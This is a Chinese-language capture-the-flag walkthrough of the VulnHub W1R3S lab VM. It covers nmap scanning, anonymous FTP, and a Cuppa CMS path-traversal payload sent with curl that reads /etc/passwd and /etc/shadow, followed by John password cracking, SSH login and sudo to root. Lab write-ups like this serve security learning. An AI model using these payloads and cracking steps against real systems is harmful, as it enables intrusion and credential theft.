W1R3S
-
下载地址
https://download.vulnhub.com/w1r3s/w1r3s.v1.0.1.zip -
安装
- 直接丢到vm中
1、主机发现
sudo nmap -sn 10.200.32.0/24
- 在靶机开启之前,用Nmap扫描一下
- 开启后,在进行扫描
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 17:00 CST
│Nmap scan report for 10.200.32.2
│Host is up (0.00017s latency).
│MAC Address: 00:50:56:FB:FF:43 (VMware)
│Nmap scan report for 10.200.32.129
│Host is up (0.000063s latency).
│MAC Address: 00:0C:29:4D:89:EC (VMware)
│Nmap scan report for 10.200.32.254
│Host is up (0.00011s latency).
│MAC Address: 00:50:56:E2:B0:10 (VMware)
│Nmap scan report for 10.200.32.128
│Host is up.
│Nmap done: 256 IP addresses (4 hosts up) scanned in 27.90 seconds
2、端口扫描
第一次扫描
sudo nmap --min-rate 10000 -p- 10.200.32.129
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 17:08 CST
Nmap scan report for 10.200.32.129
Host is up (0.00029s latency).
Not shown: 55528 filtered tcp ports (no-response), 10003 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:4D:89:EC (VMware)
Nmap done: 1 IP address (1 host up) scanned in 25.39 seconds
- 要求全
- 最少扫两遍,防止网络问题出现波动
第二次扫描
sudo nmap -sT -sV -O -p 21,22,80,3306 10.200.32.129
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 17:10 CST
Nmap scan report for 10.200.32.129
Host is up (0.00051s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:4D:89:EC (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5.1
OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9, Linux 5.1
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.11 seconds
sudo nmap -sU -p 21,22,80,3306 10.200.32.129
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 17:14 CST
Nmap scan report for 10.200.32.129
Host is up (0.00029s latency).
PORT STATE SERVICE
21/udp open|filtered ftp
22/udp open|filtered ssh
80/udp open|filtered http
3306/udp closed mysql
MAC Address: 00:0C:29:4D:89:EC (VMware)
Nmap done: 1 IP address (1 host up) scanned in 14.53 seconds
-
-sT 以TCP形式扫描, -sV扫描端口服务的版本, -O 查看扫描系统
-
用UDP 扫描一下,-sU 以UDP形式扫描一下
-
端口分析:
优先级选择:21,80,3306,22
ftp 简单, 80端口是重点
第三次扫描
使用NMAP的漏洞扫描
sudo nmap --script=vuln -p 21,22,80,3306 10.200.32.129
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_ /wordpress/wp-login.php: Wordpress login page.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
3306/tcp open mysql
MAC Address: 00:0C:29:4D:89:EC (VMware)
- DOS攻击
- wordpress搭建的东西
每个攻击向量最多不超过20分钟
3、FTP方向
ftp 10.200.32.129
Connected to 10.200.32.129.
220 Welcome to W1R3S.inc FTP service.
Name (10.200.32.129:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
- 使用匿名登录 anonymous
ftp> ls
229 Entering Extended Passive Mode (|||45817|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
226 Directory send OK.
ftp> cd content
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||49057|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 29 Jan 23 2018 01.txt
-rw-r--r-- 1 ftp ftp 165 Jan 23 2018 02.txt
-rw-r--r-- 1 ftp ftp 582 Jan 23 2018 03.txt
226 Directory send OK.
ftp> mget 0*.txt
mget 01.txt [anpqy?]?
229 Entering Extended Passive Mode (|||42914|)
150 Opening BINARY mode data connection for 01.txt (29 bytes).
100% |***********************************************************************************************************************************************************************************************| 29 0.29 KiB/s 00:00 ETA
226 Transfer complete.
29 bytes received in 00:00 (0.29 KiB/s)
mget 02.txt [anpqy?]?
229 Entering Extended Passive Mode (|||47040|)
150 Opening BINARY mode data connection for 02.txt (165 bytes).
100% |***********************************************************************************************************************************************************************************************| 165 9.09 KiB/s 00:00 ETA
226 Transfer complete.
165 bytes received in 00:00 (7.82 KiB/s)
mget 03.txt [anpqy?]?
229 Entering Extended Passive Mode (|||40937|)
150 Opening BINARY mode data connection for 03.txt (582 bytes).
100% |***********************************************************************************************************************************************************************************************| 582 458.35 KiB/s 00:00 ETA
226 Transfer complete.
582 bytes received in 00:00 (294.94 KiB/s)
ftp>cd ..
250 Directory successfully changed.
ftp> cd docs
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||45086|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 138 Jan 23 2018 worktodo.txt
226 Directory send OK.
ftp> get worktodo.txt
local: worktodo.txt remote: worktodo.txt
229 Entering Extended Passive Mode (|||48274|)
150 Opening BINARY mode data connection for worktodo.txt (138 bytes).
100% |***********************************************************************************************************************************************************************************************| 138 8.52 KiB/s 00:00 ETA
226 Transfer complete.
138 bytes received in 00:00 (8.14 KiB/s)
ftp> cd ..
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||45998|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 content
drwxr-xr-x 2 ftp ftp 4096 Jan 23 2018 docs
drwxr-xr-x 2 ftp ftp 4096 Jan 28 2018 new-employees
226 Directory send OK.
ftp> cd new-employees
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||40652|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 155 Jan 28 2018 employee-names.txt
226 Directory send OK.
ftp> get employee-names.txt
local: employee-names.txt remote: employee-names.txt
229 Entering Extended Passive Mode (|||48673|)
150 Opening BINARY mode data connection for employee-names.txt (155 bytes).
100% |***********************************************************************************************************************************************************************************************| 155 5.12 KiB/s 00:00 ETAz`
226 Transfer complete.
155 bytes received in 00:00 (5.00 KiB/s)
ftp> binary
200 Switching to Binary mode.
ftp> quit
-
最后执行binary 命令防止文件无法读取
-
发现了五个文件
1.txt,2.txt,3.txt,employee-names.txt,worktodo.txt
分别查看
-
01.txt
cat 01.txt New FTP Server For W1R3S.inc -
02.txt
# # # # # # # # 01ec2d8fc11c493b25029fb1f47f39ce # # # # # # # # # # # # # SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==-
使用hash-indentifier识别加密方式
(kali㉿kali)-[~] └─$ hash-identifier '01ec2d8fc11c493b25029fb1f47f39ce'Possible Hashs: [+] MD5 [+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))- 第一个可能是MD5,去在线网站md5解密
This is not a password- 第二个:
──(kali㉿kali)-[~] └─$ hash-identifier 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg=='Not Found.- 感觉像base64编码,试一下
┌──(kali㉿kali)-[~] └─$ echo 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==' | base64 -d It is easy, but not that easy..正确√
-
-
03.txt
└─$ cat 03.txt ___________.__ __ __ ______________________ _________ .__ \__ ___/| |__ ____ / \ / \/_ \______ \_____ \ / _____/ |__| ____ ____ | | | | \_/ __ \ \ \/\/ / | || _/ _(__ < \_____ \ | |/ \_/ ___\ | | | Y \ ___/ \ / | || | \/ \/ \ | | | \ \___ |____| |___| /\___ > \__/\ / |___||____|_ /______ /_______ / /\ |__|___| /\___ > \/ \/ \/ \/ \/ \/ \/ \/ \/无意义
-
employee-names.txt
$ cat employee-names.txt The W1R3S.inc employee list Naomi.W - Manager Hector.A - IT Dept Joseph.G - Web Design Albert.O - Web Design Gina.L - Inventory Rico.D - Human Resources -
worktodo.txt
cat worktodo.txt ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡ ....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ- 类似于字符翻转
web :https://www.upsidedowntext.com/
ı don't thınk thıs ıs the way to root! we have a ןot of work to do‘ stop pןayıng around˙˙˙˙
4、web方向
-
查看界面:
-
在用nmap做端口扫描的时候,我们发现有wordpress这个cms,尝试从这下手
-
目录爆破
feroxbuster -u http://10.200.32.129 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt- 常用工具:gobuster,dirb、feroxbuster
[####################] - 19s 30000/30000 1684/s http://10.200.32.129/ [####################] - 38s 30000/30000 800/s http://10.200.32.129/javascript/ [####################] - 29s 30000/30000 1065/s http://10.200.32.129/wordpress/ [####################] - 32s 30000/30000 953/s http://10.200.32.129/administrator/ [####################] - 27s 30000/30000 1278/s http://10.200.32.129/javascript/jquery/ [####################] - 30s 30000/30000 1005/s http://10.200.32.129/administrator/templates/ [####################] - 0s 30000/30000 0/s http://10.200.32.129/administrator/media/ => Directory listing (add -e to scan) [####################] - 25s 30000/30000 1217/s http://10.200.32.129/administrator/js/ [####################] - 0s 30000/30000 0/s http://10.200.32.129/administrator/language/ => Directory listing (add -e to scan) [####################] - 32s 30000/30000 933/s http://10.200.32.129/administrator/components/ [####################] - 26s 30000/30000 1149/s http://10.200.32.129/administrator/installation/ [####################] - 25s 30000/30000 1186/s http://10.200.32.129/administrator/classes/ [####################] - 29s 30000/30000 1081/s http://10.200.32.129/administrator/components/stats/ [####################] - 0s 30000/30000 0/s http://10.200.32.129/administrator/classes/ajax/ => Directory listing (add -e to scan) [####################] - 0s 30000/30000 0/s http://10.200.32.129/administrator/installation/html/ => Directory listing (add -e to scan) [####################] - 25s 30000/30000 1288/s http://10.200.32.129/wordpress/wp-content/ [####################] - 15s 30000/30000 1896/s http://10.200.32.129/wordpress/wp-admin/ [####################] - 0s 30000/30000 0/s http://10.200.32.129/wordpress/wp-includes/ => Directory listing (add -e to scan) [####################] - 29s 30000/30000 1049/s http://10.200.32.129/administrator/templates/default/ [####################] - 0s 30000/30000 0/s http://10.200.32.129/administrator/js/jquery/ => Directory listing (add -e to scan) [####################] - 24s 30000/30000 1533/s http://10.200.32.129/wordpress/wp-content/plugins/ [####################] - 28s 30000/30000 1113/s http://10.200.32.129/wordpress/wp-content/themes/ [####################] - 0s 30000/30000 0/s http://10.200.32.129/administrator/js/tiny_mce/ => Directory listing (add -e to scan) [####################] - 0s 30000/30000 0/s http://10.200.32.129/wordpress/wp-content/uploads/ => Directory listing (add -e to scan) [####################] - 19s 30000/30000 1697/s http://10.200.32.129/administrator/api/ [####################] - 23s 30000/30000 1287/s http://10.200.32.129/administrator/components/permissions/ -
查看 wordpress
404
测试过后,发现不行。但是出了一个新的CMS---cuppa
-
使用searchsploit 查看是否存在简单漏洞
searchsploit cuppa cmssearchsploit cuppa cms --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion | php/webapps/25971.txt --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results先下载下来
searchsploit -m 25971.txt有一个简单的漏洞,测试一下。通过多次测试发现可行。playload如下
http://10.200.32.129/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd但是,没有显示任何东西。查看文档发现,可能存在编码或请求不同的问题
尝试用curl试一下
└─$ sudo curl --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://10.200.32.129/administrator/alerts/alertConfigField.php | html2text % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 4414 100 4347 100 67 298k 4706 --:--:-- --:--:-- --:--:-- 307k Configuration: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync: x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/ usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/ var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/ nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/ var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd: /var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/ nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104: systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103: 105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/ syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false messagebus:x:106: 110::/var/run/dbus:/bin/false uuidd:x:107:111::/run/uuidd:/bin/false lightdm:x: 108:114:Light Display Manager:/var/lib/lightdm:/bin/false whoopsie:x:109:117::/ nonexistent:/bin/false avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/ avahi-autoipd:/bin/false avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi- daemon:/bin/false dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/ bin/false hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false pulse:x:117: 124:PulseAudio daemon,,,:/var/run/pulse:/bin/false rtkit:x:118:126: RealtimeKit,,,:/proc:/bin/false saned:x:119:127::/var/lib/saned:/bin/false usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false w1r3s:x:1000:1000: w1r3s,,,:/home/w1r3s:/bin/bash sshd:x:121:65534::/var/run/sshd:/usr/sbin/ nologin ftp:x:122:129:ftp daemon,,,:/srv/ftp:/bin/false mysql:x:123:130:MySQL Server,,,:/nonexistent:/bin/false发现可以
看看能不能拿到shadow(存储用户密码的文件)
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7::: daemon:*:17379:0:99999:7::: bin:*:17379:0:99999:7::: sys:*:17379:0:99999:7::: sync:*:17379:0:99999:7::: games:*:17379:0:99999:7::: man:*:17379:0:99999:7::: lp:*:17379:0:99999:7::: mail:*:17379:0:99999:7::: news:*:17379:0:99999:7::: uucp:*:17379:0:99999:7::: proxy:*:17379:0:99999:7::: www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7::: backup:*:17379:0:99999:7::: list:*:17379:0:99999:7::: irc:*:17379:0:99999:7::: gnats:*:17379:0:99999:7::: nobody:*:17379:0:99999:7::: systemd-timesync:*:17379:0:99999:7::: systemd-network:*:17379:0:99999:7::: systemd-resolve:*:17379:0:99999:7::: systemd-bus-proxy:*:17379:0:99999:7::: syslog:*:17379:0:99999:7::: _apt:*:17379:0:99999:7::: messagebus:*:17379:0:99999:7::: uuidd:*:17379:0:99999:7::: lightdm:*:17379:0:99999:7::: whoopsie:*:17379:0:99999:7::: avahi-autoipd:*:17379:0:99999:7::: avahi:*:17379:0:99999:7::: dnsmasq:*:17379:0:99999:7::: colord:*:17379:0:99999:7::: speech-dispatcher:!:17379:0:99999:7::: hplip:*:17379:0:99999:7::: kernoops:*:17379:0:99999:7::: pulse:*:17379:0:99999:7::: rtkit:*:17379:0:99999:7::: saned:*:17379:0:99999:7::: usbmux:*:17379:0:99999:7::: w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7::: sshd:*:17554:0:99999:7::: ftp:*:17554:0:99999:7::: mysql:!:17554:0:99999:7:::存储下来,并用John破解
(www-data) Almost done: Processing the remaining buffered candidate passwords, if any. Proceeding with wordlist:/usr/share/john/password.lst computer (w1r3s)尝试用ssh连接
sudo ssh w1r3s@10.200.32.129sudo ssh w1r3s@10.200.32.129 The authenticity of host '10.200.32.129 (10.200.32.129)' can't be established. ED25519 key fingerprint is SHA256:Bue5VbUKeMSJMQdicmcMPTCv6xvD7I+20Ki8Um8gcWM. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.200.32.129' (ED25519) to the list of known hosts. ---------------------- Think this is the way? ---------------------- Well,........possibly. ---------------------- w1r3s@10.200.32.129's password: Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 102 packages can be updated. 0 updates are security updates. New release '18.04.6 LTS' available. Run 'do-release-upgrade' to upgrade to it. .....You made it huh?.... Last login: Mon Jan 22 22:47:27 2018 from 192.168.0.35
5、提权
sudo -l
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User w1r3s may run the following commands on W1R3S:
(ALL : ALL) ALL
发现,我们获得的账户就是root。
w1r3s@W1R3S:~$ sudo -i
sudo: unable to resolve host W1R3S
root@W1R3S:~# ls
flag.txt
root@W1R3S:~# cat flag.txt
-----------------------------------------------------------------------------------------
____ ___ _ _ ____ ____ _ _____ _ _ _ _ _____ ___ ___ _ _ ____
/ ___/ _ \| \ | |/ ___| _ \ / \|_ _| | | | | / \|_ _|_ _/ _ \| \ | / ___|
| | | | | | \| | | _| |_) | / _ \ | | | | | | | / _ \ | | | | | | | \| \___ \
| |__| |_| | |\ | |_| | _ < / ___ \| | | |_| | |___ / ___ \| | | | |_| | |\ |___) |
\____\___/|_| \_|\____|_| \_\/_/ \_\_| \___/|_____/_/ \_\_| |___\___/|_| \_|____/
-----------------------------------------------------------------------------------------
.-----------------TTTT_-----_______
/''''''''''(______O] ----------____ \______/]_
__...---'"""\_ --'' Q ___________@
|''' ._ _______________=---------"""""""
| ..--''| l L |_l |
| ..--'' . /-___j ' '
| ..--'' / , ' '
|--'' / ` \
L__' \ -
- '-.
'. /
'-./
----------------------------------------------------------------------------------------
YOU HAVE COMPLETED THE
__ __ ______________________ _________
/ \ / \/_ \______ \_____ \ / _____/
\ \/\/ / | || _/ _(__ < \_____ \
\ / | || | \/ \/ \
\__/\ / |___||____|_ /______ /_______ /.INC
\/ \/ \/ \/ CHALLENGE, V 1.0
----------------------------------------------------------------------------------------
CREATED BY SpecterWires
-----------------